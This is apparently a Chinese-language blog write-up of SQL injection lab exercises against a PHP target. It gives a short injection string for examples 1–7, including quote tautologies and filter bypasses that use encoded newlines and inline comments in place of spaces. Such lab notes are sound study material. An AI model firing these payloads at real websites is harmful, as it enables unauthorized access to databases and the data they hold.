Attack 目標網站如下圖所示。由此頁面可發現 :
項目 | 資訊 |
program language | PHP |
Input | $_GET['name'] |
Example 1
第一個練習較為簡單,網站並無進行任何驗證。
可以推估是使用最單純的實作方式。 "SECECT * FROM TABLE_NAME where name = ' $_GET["name"] '"
?name=root' or '1'='1
Example 2
此題目經過處理後當URL有空白時,回應「ERROR NO SPACE」,避免攻擊者組成sql語法,然而此種方式可以透過添加「\t」進入語法之中,繞過驗證。
?name=root'%0aor%0a'1'='1
Example 3
example 3
?name=root'/**/or/**/'1'='1
Example 4
example 4
?id=1 or 1=1
Example 5
example 5
?id=1 or 1=1
Example 6
?id=1 or 1=1
Example 7
example 7
?id=2%0aor%0a1=1
?id=2%0A or 1 = 1
Example 8
不明白題目用意。
Example 9
不明白題目用意。
文章標籤
全站熱搜
留言列表